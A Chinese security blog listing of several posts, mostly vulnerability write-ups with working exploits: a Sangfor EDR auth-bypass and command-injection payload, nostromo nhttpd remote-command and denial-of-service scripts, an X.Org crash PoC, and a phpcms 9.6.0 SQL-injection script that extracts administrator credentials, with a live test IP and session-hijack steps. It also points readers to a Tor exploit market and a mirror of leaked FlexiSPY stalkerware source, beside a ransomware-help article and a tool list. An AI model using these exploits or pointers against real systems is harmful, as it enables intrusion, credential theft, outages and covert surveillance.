HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析

漏洞原理:

<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/f4561599781522.png" id="ematt:2842"><img src="https://mrxn.net/content/uploadfile/202009/thum-f4561599781522.png" title="点击查看原图" alt="F012EE50-3707-413D-82C6-C9F7718759E9.png" width="600" height="59"></a>
</p>
<p>
    <br></p>
<p>
    dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口
</p>
<p>
    主要调用
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/cede1599781522.png" id="ematt:2844"><img src="https://mrxn.net/content/uploadfile/202009/thum-cede1599781522.png" title="点击查看原图" alt="E8268018-6639-4801-AF13-BB3F0FF6829A.png" width="375" height="300"></a>
</p>
<p>
    <br></p>
<p>
    跟进
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/2ea11599781522.png" id="ematt:2846"><img src="https://mrxn.net/content/uploadfile/202009/thum-2ea11599781522.png" title="点击查看原图" alt="BE3A4B01-2ED7-4CAC-86F2-343DC6D79EBC.png" width="361" height="300"></a>
</p>
<p>
    <br></p>
<p>
    可以看到 第一个检查为  $req_url = $_SERVER['PHP_SELF'];
</p>
<p>
    绕过第一个检查:
</p>
<p>
    在他们系统nginx配置文件里面:
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/26021599781522.png" id="ematt:2848"><img src="https://mrxn.net/content/uploadfile/202009/thum-26021599781522.png" title="点击查看原图" alt="CBA339A6-1CB7-4BE2-AF11-3EADD2B5C33D.png" width="354" height="300"></a>
</p>
<p>
    <br></p>
<p>
    通过nginx规则可以得知,他们没有设置禁止外网访问.从而可以直接访问
</p>
<p>
    /api/edr/sangforinter/v2/xxx 绕过 第一个检查
</p>
<p>
    第二检查: 权限检查
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/3f2c1599781523.png" id="ematt:2850"><img src="https://mrxn.net/content/uploadfile/202009/thum-3f2c1599781523.png" title="点击查看原图" alt="F3B31647-71BB-42D6-91CC-09C3F529E61A.png" width="444" height="300"></a>
</p>
<p>
    <br></p>
<p>
    跟进check_access_token
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/36a01599781523.png" id="ematt:2852"><img src="https://mrxn.net/content/uploadfile/202009/thum-36a01599781523.png" title="点击查看原图" alt="5D03BF41-9387-480E-B8F9-ED660ABAD1D4.png" width="419" height="300"></a>
</p>
<p>
    <br></p>
<p>
    这里if($md5_str == $json_token["md5"]) 引发第二个漏洞: php弱类型导致的漏洞
</p>
<p>
    绕过只需要传入一个base64编码的json内容为 {“md5”:true}即可
</p>
<p>
    <br></p>
<p>
    至此 权限检查绕过完毕
</p>
<p>
    来到  process_cssp.php 文件
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/c4241599781523.png" id="ematt:2854"><img src="https://mrxn.net/content/uploadfile/202009/thum-c4241599781523.png" title="点击查看原图" alt="9894AD7B-B9B9-4911-B455-354B4662E43A.png" width="451" height="300"></a>
</p>
<p>
    <br></p>
<p>
    存在任意指令执行漏洞.作者试图使用escapeshellarg函数去给单引号打反斜杠实际上是毫无作用的.
</p>
<p>
    绕过:{"params":"w=123\"'1234123'\"|命令"}
</p>
<p>
    <br></p>
<p>
    结果如下:
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/481a1599781523.png" id="ematt:2856"><img src="https://mrxn.net/content/uploadfile/202009/thum-481a1599781523.png" title="点击查看原图" alt="6A999ACE-9B45-4BBD-AC7A-F7675192C15B.png" width="600" height="284"></a>
</p>
<p>
    <br></p>
<p>
    返回:
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/471b1599781523.png" id="ematt:2858"><img src="https://mrxn.net/content/uploadfile/202009/thum-471b1599781523.png" title="点击查看原图" alt="C798DE63-2AC0-4AC5-B8FF-716924FC7ECB.png" width="600" height="121"></a>
</p>
<p>
    <br></p>
<p>
    <br></p>

Mrxn 发布于 2020-9-11 07:42

CVE-2019-16278&CVE-2019-16279-nostromo nhttpd 路径遍历漏洞和Dos漏洞

0x1.nostromo nhttpd简介

nostromo nhttpd是一款简单,快速的开源Web服务器,其作者是来自瑞士tiefen Boden 7的马库斯·格洛克(Marcus Glocker)。

0x2.漏洞来源 

10月14日来自hackthebox名人堂第290名精英黑客sp0re公布了 nostromo nhttpd 1.9.6(目前最新版,算是0day吧)及之前版本中的‘http_verify’函数存在路径遍历漏洞CVE-2019-16278和拒绝服务攻击(Dos)CVE-2019-16279 。

0x3.漏洞详情 

CVE-2019-16278漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素,攻击者可利用该漏洞访问受限目录之外的位置,

而且这个漏洞是因为 对CVE-2011-0751漏洞的未完全修复导致攻击者可以利用类似 /../ 的路径格式绕过限制从而通过 /bin/sh 来执行任意参数,即命令执行

例如:


$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)

而CVE-2019-16279是在当攻击者在单连接中发送大量的 \r\n 就会导致 nhttpd 出现内存错误,从而导致决绝服务。

例如:

$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

0x4.漏洞相关脚本 

CVE-2019-16278.sh:

#!/usr/bin/env bash

HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "[email protected] 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

CVE-2019-16279.sh:

#!/usr/bin/env bash

HOST="$1"
PORT="$2"

echo -n -e '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n' | nc "$HOST" "$PORT"



同时,我也更新了一份到我的GitHub漏洞收集仓库:https://github.com/Mr-xn/Penetration_Testing_POC ,欢迎大家一起start和贡献!

相关资料:

http://www.nazgul.ch/dev_nostromo.html

https://git.sp0re.sh/sp0re/Nhttpd-exploits


Mrxn 发布于 2019-10-21 20:57

CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC

CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC

0x1 简单介绍

X Server 是绝大对数Linux发行版和Unix系统的基础图形界面程序,是系统标配。而此程序也是以Root权限启动的,因而成功溢出它而获得的shell,也是root权限。

0x2 漏洞相关信息

# 时间: 2019-10-16

# 作者: Marcelo Vázquez (s4vitar)

# 厂商: https://www.x.org/

# 版本: <= 1.20.4

# 测试平台: Linux

# CVE: CVE-2019-17624



0x3 POC

#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *
# ************************************************************************

import sys, time
import ctypes as ct

from ctypes import cast
from ctypes.util import find_library

def access_violation(x11, current_display):
  keyboard = (ct.c_char * 1000)()
  x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':

  print "\n[*] Loading x11...\n"
  time.sleep(2)

  x11 = ct.cdll.LoadLibrary(find_library("X11"))
  current_display = x11.XOpenDisplay(None)

  print "[*] Exploiting...\n"
  time.sleep(1)

  try:
    access_violation(x11, current_display)

  except:
    print "\nError...\n"
    sys.exit(1)



参考: https://www.exploit-db.com/exploits/47507


Mrxn 发布于 2019-10-16 23:02

0day.today「一个0day漏洞交易市场」

在pastebin上看到的,想要买卖0day的可以进去看看,不想做买卖的也可以进去瞧瞧,原文如下:

be careful: if http://0day.today redirecting to pastebin page - your ip block.
Download TOR Browser and use TOR mirror http://mvfjfugdwgc5uwho.onion



意思就是说如果你直接浏览器打开 http://0day.today 跳转回 pastebin.com 说明你的IP被封了,换TOR浏览器打开他们在暗网上的网站地址:http://mvfjfugdwgc5uwho.onion .

shotpic_2019-04-27_21-33-36.png

打开界面如上图所示,你可以选择你的语言,包括:英语、俄语、德语、捷克语(土耳其)、法语、意大利语、希腊语、西班牙语、罗马尼亚文、波兰语、阿拉伯语(沙拉阿拉伯)、日文、中文等语种可供选择,但是建议不选择,默认英文即可。至于为什么不建议选择,当然是为了那可怜的隐私。

要进入网站需要同意网站的声明:网站收集的EXP和各种漏洞仅作为安全研究人员用途,我们只是收集并不负责,你需要自行承担所有的责任。(锅摔干净了!)

下面的用户协议、法律信息、声明等等就不一一翻译了,我想大部分人从不看网站的这些协议吧,简单的粘贴一下Google机翻的:

用户协议
任何访问该网站0day.today的人必须接受条款和条件(如下所列),或者立即离开0day.today。
如果您不同意0day.today的规则,您必须立即离开0day.today。
0day.today团队很高兴邀请您参与我们的项目 - 您需要做的就是注册开始!

一般信息
关于0day.today及其团队的官方信息仅在0day.today网站上发布。
不要依赖别人说的负面批评/谣言 - 这是一个误区!我们不会破坏任何网站,也不会攻击任何网络服务器。
0day.today团队专门研究bug研究,而不是恶意行为。
0day.today在没有任何保证的情况下发布,仅用于教育目的。
0day.today及其团队不负责非法使用所提供的信息。
0day.today是您的新数字朋友,他将帮助您避免网站上的许多安全问题!

司法,法律,程序员和源代码
我们特别注意遵守所有必要的欧洲法律,但我们行使权利以安全的方式交换信息。
所有提交的漏洞都将转发给产品制造商,并将发布以保护您的本地环境。
如果提交包含恶意代码,非法注释和/或敏感详细信息,则将删除或修改提交。

0day.today 1337day使命宣言
0day.today 1337day Mission将提供标准和技术数据库,以保护您的信息系统免受可能的威胁。
某些威胁可能针对您的信息/流程的机密性或完整性以及您的信息和服务的可用性。
在0day.today 1337day,我们会在发现新的安全漏洞时尽快通知您,以便您采取适当的措施来修补/修复它们。

0day.today 1337day团队的正式声明
我们不批准或鼓励任何人取消任何供应商许可,破坏网站,侵入数据库和/或使用欺诈或被盗材料进行交易。
我们不公布反对某些宗教,支持恐怖主义/种族主义或任何负面性质的咨询/漏洞。
我们不允许会员在我们的数据库或电子邮件中进行任何犯罪活动或请求。此类示例将立即删除,不做任何评论。
0day.today 1337day按“原样”向您提供信息,对您造成的任何损害不承担任何责任。
Inj3ct0r包含在某些国家/地区可能被视为非法的信息。
此类信息仅供教育之用,不得用于非法活动。 // 0day.today 1337day行政



当你同意这些协议后,点击 Yes, I agree 就进入网站了。进入网站后可以注册搜索等等,网站支持BT币作为交易货币,网站同时提供收费的和免费的漏洞,漏洞EXP类型包括(local, remote, DoS, PoC, 等) ,目前漏洞库共收录32442个漏洞,包括0day,各种语言的,平台,比如Java、php(包括国内的74CMS,国外wordpress等)、Android、Windows、Linux软件还包括像Sony电视等硬件的漏洞,你也可以通过搜索来搜索你感兴趣的漏洞或者是根据分类来筛选。而且漏洞都比较新,下面列举首页的一部分漏洞:

Twitter reset account Private Method 0day Exploit,
Instagram bypass Access Account Private Method Exploit、
SMF 2.1 Beta 2 Remote Code Execution 0day Exploit、
SMF 2.0.x Remote Code Execution 0day Exploit、
Snapchat takeover any account 0day Exploit、
Tebilisim Remote File Read Vulnerability、
Mod_Security <= 3.0 Bypass XSS Payload Vulnerability、
facebook - Grabbing  permanent access token which Never expires of your accounts and pages .、
Google Chrome 72.0.3626.121 / 74.0.3725.0 - NewFixedDoubleArray Integer Overflow Exploit、
Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit、
ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution Exploit、
MailCarrier 2.51 - POP3 (RETR) SEH Buffer Overflow Exploit、
Lavavo CD Ripper 4.20 Local SEH Exploit、
VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation Exploit、
RARLAB WinRAR ACE Format Input Validation Remote Code Execution Exploit、Sony Smart TV Information Disclosure / File Read Vulnerabilities、
Ross Video DashBoard 8.5.1 - Insecure Permissions Vulnerability、
LibreOffice 6.0.7 / 6.1.3 - Macro Code Execution Exploit、
Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting Vulnerability、
osTicket 1.11 - Cross-Site Scripting / Local File Inclusion VulnerabilitiesUliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting Exploit、
74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User) Exploit、
WordPress Contact Form Builder 1.0.67 Plugin - CSRF / Local File Inclusion Exploit、
Backup Key Recovery 2.2.4 - Denial of Service Exploit、
HeidiSQL 10.1.0.5464 - Denial of Service Exploit、
Linux - (page->_refcount) Overflow via FUSE Exploit、
Linux/x86 - Rabbit Shellcode Crypter (200 bytes)、
Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)、
Linux/x86 - add user to passwd file Shellcode (149 bytes)、
Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)



home-page.pngexp-db.png

提示:暗网比表网的骗局还要多,自己慎重交易!


Mrxn 发布于 2019-4-27 21:33

phpcms_v9.6.0_sql注入与exp

phpcms_v9.6.0_sql注入分析

可疑的函数

localhost/phpcms/modules/attachment/attachments.php文件的第241GET提交src变量带上了safe_relace函数,现在我们跟入这个该死的过滤函数看看它到底在搞什么鬼....*/

2.过滤函数剖析和绕过

localhost/phpcms/libs/functions/global.func.php文件的63行开始可以看到此处将传入的%27和%2527都进行删除处理也就是还没传入数据库前就已经被该死的程序吃了,但是在67行看到他还吃了*这样我们就有办法了也就是传入%*27程序吃掉星号后%27就会被传入。*/

3.src变量到底去哪了

/*这里不做截图请回到第一步的截图查看,在241行代码src传入arr数组后在243行被json_encode函数加密为json格式后传入json_str数组,然后在244行代码又将json加密为cookie。在这里我做个大胆的假设src存在注入那么我们要传入参数:src=%*27 updatexml(1,concat(1,(user())),1)%23;那么我们传入的参数将会被json加密后最终成为了:{src:%*27 updatexml(1,concat(1,(user())),1)%23};再然后就是cookie加密这里不做计算cookie加密值需要的同学自己echo,假设暂且到这,它的最终这些动作都被赋值为swfupload_json函数。到此src变量故事以及完结请看下一章。*/

down.php的decode成全了我

/*在localhost/phpcms/modules/content/down.php的第14行代码将a_k变量进行了decode操作这样子我们把刚刚在src进行加密的SQL传入a_k他就会进行解密还原回json,17行 将json字符串解析成变量 -> parse_str 以 & 区分,将字符串解析成3个变量最后传入SQL为:{“aid":1,"src":"&id=%27 updatexml(1,concat(1,(user)),1)#&m=1&f=haha&modelid=2&catid=7&”,”filename”:””};此处可以看到之前%*27的*没了因为已经被他妈的狗比安全函数吃了*。最后我们看在第26行代码将id传入SQL字段id既然这样那就OK了我们尝试还原。*/

phpcms_v9.6.0_sql注入还原

1.访问/index.php?m=wap&c=index&a=init&siteid=1获取一个cookie值传入该死的src那块操作否则会没有身份

2.把这个傻逼cookie的值复制下来以POST传入userid_flash变量访问/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26不要问我URL编码里面是什么东西我会告诉你那是SQL的Payload

3.上一步我们已经获取到了通过json在通过cookie加密的SQL了因为他返回的cookie就是已经加密的SQLPayload现在我们传入到a_k变量看看到底发生了什么?

网上这个文档传的很快

作者我也不知道是谁

大家都把版权改成自己的

我也是醉了

有知情人士可留言~给人家一个版权

下面是EXP:

import requests,sys,urllib

url = sys.argv[1]

print 'Phpcms v9.6.0 SQLi Exploit Code By Luan'

sqli_prefix = '%*27an*d%20'

sqli_info = 'e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))'

sqli_password1 = 'e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om '

sqli_password2 = '_admin li*mit 0,1)x))'

sqli_padding = '%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6'

setp1 = url + '/index.php?m=wap&a=index&siteid=1'

cookies = {}

for c in requests.get(setp1).cookies:

if c.name[-7:] == '_siteid':

cookie_head = c.name[:6]

cookies[cookie_head+'_userid'] = c.value

cookies[c.name] = c.value

print '[+] Get Cookie : ' + str(cookies)

setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_info, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding

for c in requests.get(setp2,cookies=cookies).cookies:

if c.name[-9:] == '_att_json':

sqli_payload = c.value

print '[+] Get SQLi Payload : ' + sqli_payload

setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload

html = requests.get(setp3,cookies=cookies).content

print '[+] Get SQLi Output : ' + html.split('luan$')[1]

table_prefix = html[html.find('_download_data')-2:html.find(    '_download_data')]

print '[+] Get Table Prefix : ' + table_prefix

setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_password1, safe='qwertyuiopasdfghjklzxcvbnm*') + table_prefix + urllib.quote_plus(sqli_password2, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding

for c in requests.get(setp2,cookies=cookies).cookies:

if c.name[-9:] == '_att_json':

sqli_payload = c.value

print '[+] Get SQLi Payload : ' + sqli_payload

setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload

html = requests.get(setp3,cookies=cookies).content

print '[+] Get SQLi Output : ' + html.split('luan$')[1]

exp也是别人分享给我的

看起来作者应该是luan

测试地址:

122.9.16.209


成功截图:

不过呢,众所周知

phpcms的密文特别难解密

所以有个配合使用的方法

通过sql注入漏洞读取数据库信息

但是不能破解密码的情况下

可以绕过后台验证

phpcms数据库中表v9_session

保存着管理员登录的信息

而且字段sessionid保存着就是

已经登录管理后台的PHPSESSID

可以通过sql注入读取到这个值

并写入到自己的浏览器中。

直接访问后台地址:

/index.php?m=admin&c=index&a=public_menu_left

将数据库中的sessionid信息带入!

相关文章网上也有

最后,我还是觉得这个漏洞挺鸡肋的

至于哪里鸡肋请看官细细体会

还有几个更牛逼的漏洞也许

过几天就会有人放出来了

反正我不做第一个吃螃蟹的人了

怕被打死~

原文地址:https://zhuanlan.zhihu.com/p/26263513

PS:很多政府机关/事业单位都是phpcms,我批量检测里面有很多都中招了,赶紧升级吧!阿西吧...据说二月份就出来了...


Mrxn 发布于 2017-4-24 21:30

号称全球最权威的监控软件 FlexiSPY 被黑,相关源码、编译、文档被泄漏

号称全球最权威的监控软件 FlexiSPY 被黑,相关源码、编译、文档被泄漏,

在4月22日,由 @fleximinx 储存整理.

Source files:


bb_cyclops.zip d84f692b12c732e14ad463b4d7d0ec34 from Tweet Mega : files in 2012-01-11_v.1.03.2 folder

Gamma.zip cff15a5bad15118a7e43c1c3f0d13df1 from Tweet Mega : Gamma Symbian malware certs/signatures in Gamma folder

bin.zip aa735cb779ce9089665eb821f596a7eb from Tweet Mega : binaries of apps in bin folder

omni.zip 4677a66eab2d44e410dfb36da64705c5 from Tweet Mega : source code of Android app in 1.00.1 folder

android_cyclops.zip 5c80bcb6576d5c58143ea48ee43de5f8 from Tweet Mega : source code of Android Cyclops in Cyclops -1.00.4 folder

iphone_phoenix_4.9.1.zip 25b7416a26624ffec76b3197f84f0d59 Tweet Mega : source code of IOS app in FlexiSPY Phoenix 4.9.1 folder



github备份地址: https://github.com/Mrxn-code/flexidie


其实 FlexiSPY 就是个灰色地带的“间谍”软件。

FlexiSPY 官网有中文页面,可以细细了解下它在干什么:

https://www.flexispy.com/zh/





Mrxn 发布于 2017-4-24 10:29

警惕office出轨,慎点不可描叙的地方

刚看到微步出了报告,感觉也只是冰山一角,这个漏洞最早由卖咖啡和火眼爆出,看nccgroup报告16底就已经出现,近期开始特别活跃起来,有用于rat/rookit/银行木马。


样本会是一个rtf格式的文档,后缀可以是doc等office文档。


一个关键点是攻击者需要搭建一个服务器,通过olelink对象产生的请求可以返回成一个pplication/hta类型,运行脚本完成最终的payload。


因此,样本会具有实时性,黑客如果关闭下载hta的服务器将很难追踪分析到最终的payload。


想了解详情的同学,推荐关注火眼和nccgroup的报告,完整的exploit估计也快公开了~

点击查看原图


Mrxn 发布于 2017-4-13 06:20

勒索?没钱!要命不?不给!

宅客频道谢幺最近发现了一个神奇的网站 ,看名字就感觉牛逼轰轰的:

No more Ransom( 不再付赎金)

No more Ransom ,不再付赎金!没钱!“要钱没有,要命一条” 。

打开首页,依然调性十足,上来就直入主题:“小伙,需要帮你解锁被黑客加密勒索的数据吗?”

0.jpg


上来就问我需不需要服务, 我当然不能示弱,“NO”,不需要!

然后静静等待接下来发生的事情……结果出现了一条网络勒索的预防建议(注:我看不懂英文所以用机器翻译成中文了),感觉还挺贴心的。

1.jpg



如果点击“Yes” (需要服务), 一个“密码警长”(Crypto Sheriff)的头像出现了,他会让你提交勒索者加密的文件以及勒索信息,然后为你搜寻目前网上的解密方案,如果有的话,会免费提供方案下载。

2.jpg



警长的意思似乎是:

“别怕,告诉我是谁,警长罩着你!”


除了提供被勒索的解决方案,这个网站还提供了数十款勒索软件的解密工具和使用指南,最关键是完全免费。

3.jpg


其实,这位“密码警长”的背后真的是警察在做支撑,还是国际刑警。


这个名为“No more ransom ”的项目是一年前由荷兰警署、欧洲国际刑警出资,联合卡巴斯基、因特尔安全两家安全机构共同建立的国际“反勒索”平台。


据外媒报道的数据,这个平台成立至今,已经有超过10,000 名来自世界各地的受害者来到这个网站寻求帮助,并成功在没花一分钱的情况下完成数据解密。


平台还充分发挥了众筹的精神,上面的大部分勒索软件解密工具都是由来自世界各地的安全机构和个人开发者免费提供的。


项目刚推出几个月,就汇聚了非常多的解密工具。2016年底,又有 15个新的勒索解密工具加入了“反勒索”豪华午餐,为勒索受害者带来了新的希望。


提供这些解密工具的分别有(好人好事必须点个名):


Avast、Bitdefender、CheckPoint、Trend Micro、Eleven Paths、Emsisoft、Kaspersky Lab


在网站的“合作伙伴”一栏,有非常多的组织LOGO,宅客频道算了算,差不多已经有一百家组织加入其中,有的提供解密工具,有的提供资源和技术支持。


这表明防御网络勒索已经成为了一个全球性的问题,需要一起并肩作战。


除了免费的工具提供和技术服务,网站还有一个勒索问答,从网络勒索的历史一直讲到如何防范和解决勒索问题。

4.jpg



但是,以上内容全部没有中文版本(上面的中文全是翻译的)。


根据有关数据,目前该网站大多数访问者来自 俄罗斯、荷兰、美国、意大利、德国。


最初,该网站主要提供英语、法语、意大利语、葡萄牙语和俄语,而现在已经支持了更多语言,包括芬兰语、德语、日语、韩语、斯洛文尼亚语、西班牙语等。


所以目测未来还会支持更多语言,为世界上更多的人提供反勒索服务。(也不知什么时候支持中文)


目前这一组织也已得到了来自澳大利亚、比利时、以色列、韩国、俄罗斯、乌克兰等多个国家执法机构和国际刑警的支持。


各国执法机构出动,国际刑警支持,看来这反网络勒索的决心还是很大的。不过看到下面这些新闻,相信也能理解其中的原因了。

5.jpg


这个项目的主页:

https://www.nomoreransom.org/

原文为微信公众号-宅客频道 




Mrxn 发布于 2017-4-7 15:20

漏洞练习平台总结

漏洞及渗透练习平台:

WebGoat漏洞练习环境

https://github.com/WebGoat/WebGoat

https://github.com/WebGoat/WebGoat-Legacy

Damn Vulnerable Web Application(漏洞练习平台)

https://github.com/RandomStorm/DVWA


数据库注入练习平台  

https://github.com/Audi-1/sqli-labs


用node编写的漏洞练习平台,like OWASP Node Goat

https://github.com/cr0hn/vulnerable-node


花式扫描器 :

端口扫描器Nmap

https://github.com/nmap/nmap


本地网络扫描器

https://github.com/SkyLined/LocalNetworkScanner


子域名扫描器

https://github.com/lijiejie/subDomainsBrute


漏洞路由扫描器

https://github.com/jh00nbr/Routerhunter-2.0


迷你批量信息泄漏扫描脚本

https://github.com/lijiejie/BBScan


Waf类型检测工具

https://github.com/EnableSecurity/wafw00f


信息搜集工具 :

社工插件,可查找以email、phone、username的注册的所有网站账号信息

https://github.com/n0tr00t/Sreg


Github信息搜集,可实时扫描查询git最新上传有关邮箱账号密码信息

https://github.com/sea-god/gitscan


github Repo信息搜集工具

https://github.com/metac0rtex/GitHarvester


WEB:

webshell大合集

https://github.com/tennc/webshell


渗透以及web攻击脚本

https://github.com/brianwrf/hackUtils


web渗透小工具大合集

https://github.com/rootphantomer/hack_tools_for_me


XSS数据接收平台

https://github.com/firesunCN/BlueLotus_XSSReceiver


XSS与CSRF工具

https://github.com/evilcos/xssor


Short for command injection exploiter,web向命令注入检测工具

https://github.com/stasinopoulos/commix


数据库注入工具

https://github.com/sqlmapproject/sqlmap


Web代理,通过加载sqlmap api进行sqli实时检测

https://github.com/zt2/sqli-hunter


新版中国菜刀

https://github.com/Chora10/Cknife


.git泄露利用EXP

https://github.com/lijiejie/GitHack


浏览器攻击框架

https://github.com/beefproject/beef


自动化绕过WAF脚本

https://github.com/khalilbijjou/WAFNinja


http命令行客户端,可以从命令行构造发送各种http请求(类似于Curl)

https://github.com/jkbrzt/httpie


浏览器调试利器

https://github.com/firebug/firebug


一款开源WAF

https://github.com/SpiderLabs/ModSecurity


windows域渗透工具:

windows渗透神器

https://github.com/gentilkiwi/mimikatz


Powershell渗透库合集

https://github.com/PowerShellMafia/PowerSploit


Powershell tools合集

https://github.com/clymb3r/PowerShell


Fuzz:

Web向Fuzz工具

https://github.com/xmendez/wfuzz


HTTP暴力破解,撞库攻击脚本

https://github.com/lijiejie/htpwdScan


漏洞利用及攻击框架:

msf

https://github.com/rapid7/metasploit-framework


Poc调用框架,可加载Pocsuite,Tangscan,Beebeeto等

https://github.com/erevus-cn/pocscan


Pocsuite

https://github.com/knownsec/Pocsuite


Beebeeto

https://github.com/n0tr00t/Beebeeto-framework


漏洞POC&EXP:

ExploitDB官方git版本

https://github.com/offensive-security/exploit-database


php漏洞代码分析

https://github.com/80vul/phpcodz


Simple test for CVE-2016-2107

https://github.com/FiloSottile/CVE-2016-2107


CVE-2015-7547 POC

https://github.com/fjserna/CVE-2015-7547


JAVA反序列化POC生成工具

https://github.com/frohoff/ysoserial


JAVA反序列化EXP

https://github.com/foxglovesec/JavaUnserializeExploits


Jenkins CommonCollections EXP

https://github.com/CaledoniaProject/jenkins-cli-exploit


CVE-2015-2426 EXP (windows内核提权)

https://github.com/vlad902/hacking-team-windows-kernel-lpe


use docker to show web attack(php本地文件包含结合phpinfo getshell 以及ssrf结合curl的利用演示)

https://github.com/hxer/vulnapp


php7缓存覆写漏洞Demo及相关工具

https://github.com/GoSecure/php7-opcache-override


XcodeGhost木马样本

https://github.com/XcodeGhostSource/XcodeGhost


中间人攻击及钓鱼

中间人攻击框架

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

https://github.com/byt3bl33d3r/MITMf


Inject code, jam wifi, and spy on wifi users

https://github.com/DanMcInerney/LANs.py


可扩展的中间人代理工具

https://github.com/intrepidusgroup/mallory


wifi钓鱼

https://github.com/sophron/wifiphisher


密码破解:

密码破解工具

https://github.com/shinnok/johnny


本地存储的各类密码提取利器

https://github.com/AlessandroZ/LaZagne


二进制及代码分析工具:

二进制分析工具

https://github.com/devttys0/binwalk


系统扫描器,用于寻找程序和库然后收集他们的依赖关系,链接等信息

https://github.com/quarkslab/binmap


rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O (doesn't support the FAT binaries) x86/x64 binaries.

https://github.com/0vercl0k/rp


Windows Exploit Development工具

https://github.com/lillypad/badger


二进制静态分析工具(python)

https://github.com/bdcht/amoco


Python Exploit Development Assistance for GDB

https://github.com/longld/peda


对BillGates Linux Botnet系木马活动的监控工具

https://github.com/ValdikSS/billgates-botnet-tracker


木马配置参数提取工具

https://github.com/kevthehermit/RATDecoders


Shellphish编写的二进制分析工具(CTF向)

https://github.com/angr/angr


针对python的静态代码分析工具

https://github.com/yinwang0/pysonar2


一个自动化的脚本(shell)分析工具,用来给出警告和建议

https://github.com/koalaman/shellcheck


基于AST变换的简易Javascript反混淆辅助工具

https://github.com/ChiChou/etacsufbo


EXP编写框架及工具:

二进制EXP编写工具

https://github.com/t00sh/rop-tool


CTF Pwn 类题目脚本编写框架

https://github.com/Gallopsled/pwntools


an easy-to-use io library for pwning development

https://github.com/zTrix/zio


跨平台注入工具( Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android.)

https://github.com/frida/frida


隐写:

隐写检测工具

https://github.com/abeluck/stegdetect


各类安全资料:

域渗透教程

https://github.com/l3m0n/pentest_study


python security教程(原文链接http://www.primalsecurity.net/tutorials/python-tutorials/)

https://github.com/smartFlash/pySecurity


data_hacking合集

https://github.com/ClickSecurity/data_hacking


mobile-security-wiki

https://github.com/exploitprotocol/mobile-security-wiki


书籍《reverse-engineering-for-beginners》

https://github.com/veficos/reverse-engineering-for-beginners


一些信息安全标准及设备配置

https://github.com/luyg24/IT_security


APT相关笔记

https://github.com/kbandla/APTnotes


Kcon资料

https://github.com/knownsec/KCon


ctf及黑客资源合集

https://github.com/bt3gl/My-Gray-Hacker-Resources


ctf和安全工具大合集

https://github.com/zardus/ctf-tools


